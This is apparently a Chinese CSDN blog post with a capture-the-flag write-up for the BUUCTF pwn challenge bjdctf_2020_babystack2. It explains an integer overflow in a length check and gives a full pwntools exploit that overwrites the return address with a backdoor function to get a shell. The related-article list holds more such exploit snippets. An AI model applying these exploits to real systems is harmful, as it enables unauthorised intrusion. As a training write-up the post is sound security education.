[BUUCTF]PWN——bjdctf_2020_babystack2

最新推荐文章于 2023-10-22 18:11:21 发布
最新推荐文章于 2023-10-22 18:11:21 发布
阅读量590 收藏 4
点赞数 1
分类专栏: BUUCTF刷题记录 PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/mcmuyanga/article/details/109466921
版权

bjdctf_2020_babystack2

附件

步骤:

  1. 例行检查,64位程序,开启了nx保护
    在这里插入图片描述
  2. 尝试运行一下程序,看看情况
    在这里插入图片描述
  3. 64位ida载入,习惯性的先检索程序里的字符串,发现了bin/sh,双击跟进,找到了程序里的后门函数,backdoor=0x400726
    在这里插入图片描述
  4. 从main函数开始看程序
    在这里插入图片描述
    我们读入数据的大小由我们输入的参数nbytes控制,但是nbytes又不能大于10,这边注意到了nbytes参数的类型–>size_t
    百度百科里对这个类型的解释是
    在这里插入图片描述
    大概就是一个无符号整型,注意重点是无符号,注意一下对nbytes的判断,这边将它转换成了有符号的整型,存在整数溢出漏洞
    在这里插入图片描述
    wiki上有对整数溢出的整理
    https://ctf-wiki.github.io/ctf-wiki/pwn/linux/integeroverflow/intof-zh/
    csdn上也有
    https://blog.csdn.net/xzli8_geo/article/details/83794268
    大概就是一个无符号的数转换成有符号的整型后超过了有符号的整型能表示的范围,造成了溢出
    在这里插入图片描述
    常见的利用方式是输入-1 来造成整型溢出,之后覆盖ret为backdoor即可获取shell

完整exp:

from pwn import *

r=remote('node3.buuoj.cn',28910)
backdoor=0x400726

r.recv()
r.sendline('-1')
r.recv()

payload='a'*(0x10+8)+p64(backdoor)
r.sendline(payload)

r.interactive()

在这里插入图片描述

Angel~Yan
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTFbjdctf_2020_babystack2
m0_51251108的博客
12-30 312
BUUCTFbjdctf_2020_babystack2 64位,无canary 有后门函数 这题思路就是用无符号和有符号整型来绕过10的比较 比如:送入一个-1,无符号类型会把它看成一个很大的正整数,是,而有符号则认为是-1 这题size_t是一种无符号整型,下面被强转成有符号,最后又强转成无符号 所以可以绕过 exp: from pwn import* r=remote('node3.buuoj.cn',29907) context.log_level = 'debug' backdoor=0
【CTF】bjdctf_2020_babystack2
凉水的博客
06-30 613
bjdctf_2020_babystack2
bjdctf_2020_babystack2
m0sway的博客
04-04 384
bjdctf_2020_babystack2 WriteUp BUU_PWN
[BJDCTF 2020]babystack2.0
llovewuzhengzi的博客
10-22 148
不存在file.plt[“backdoor”] plt是外部函数才有的 只能用file.symbol[“backdoor”]HIDWORD作用是取得某个8字节变量(即32位的值)在内存中处于高位的四个字节,即两个word长的数据。LODWORD作用是取得某个8字节变量(即32位的值)在内存中处于低位的四个字节,即两个word长的数据。用file.plt[“system”]不行,因为直接这样覆盖返回地址没有参数。IDA的栈不完全对,保存的ebp都没有显示,所以IDA只能参考。
NSSCTF PWN (入门)
农夫果园好好喝的博客
09-18 1594
这不是欺负老实人嘛~
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
AVR系列单片机Mage8PWM脉冲输出程序
PWN.rar_PWN
09-24
本代码是在Keil uVision3环境下使用c语言编写的。功能是使用片内pgaPWN输出占空比可变的方波。
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
Pulse Width modulation using Verilog HDL
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 381
buuctf-pwn 001-016题wp
[buuctf]bjdctf_2020_babystack
逆向萌新的博客
06-19 645
[buuctf]bjdctf_2020_babystack
CTF buuoj pwn-----第10题: bjdctf_2020_babystack
热门推荐
bing_Max的博客
09-28 2万+
思路 本体有后门函数, 最简单的是直接调用. 这里想用一下system函数,一开始忘了是32位的,写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag 编写exp from pwn import * con
【CTF】BUUCTF-bjdctf_2020_babystack1
weixin_53394081的博客
03-06 365
PWN
【CTF】bjdctf_2020_babystack 1
凉水的博客
01-21 1250
解题思路: 1 先反编译: undefined8 main(void) { undefined local_18 [12]; uint local_c; setvbuf(stdout,(char *)0x0,2,0); setvbuf(stdin,(char *)0x0,1,0); local_c = 0; puts("**********************************"); puts("* Welcome to the BJDCTF! *
CTF-Pwn-[BJDCTF 2nd]secret
归子莫的博客
05-06 1477
CTF-Pwn-[BJDCTF 2nd]secret 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Pwn类,[BJDCTF 2nd]secret 下载题目文件 secret 思路 老规矩使用file...
[BUUCTF]PWN——bjdctf_2020_babystack
BangSen1的博客
03-29 284
例行检查,64位,开启NX保护 运行一下, 用IDA打开,检索字符串,看到了后门 跟进查看。 找到了地址,shelladdr=0x4006EA 查看主函数 接收函数长度由我们自己决定,由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.
BUUCTF(pwn)bjdctf_2020_babystack
半岛铁盒的博客
03-29 419
from pwn import * p = remote("node3.buuoj.cn",27955) sys = 0x04006E6 p.sendlineafter("[+]Please input the length of your name:\n",'200') payload = 'a' * (0x10 + 0x8) + p64(sys) p.sendlineafter("[+]What's u name?\n",payload) p.interactive() 有疑问的欢迎留言∑ ...
bjdctf_2020_babystack
z1r0的博客
12-04 228
bjdctf_2020_babystack 查看保护 可以控制size,所以想怎么pwn就怎么pwn,ret2text。 from pwn import * context(arch='amd64', os='linux', log_level='debug') file_name = './z1r0' debug = 1 if debug: r = remote('node4.buuoj.cn', 27112) else: r = process(file_name) elf
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值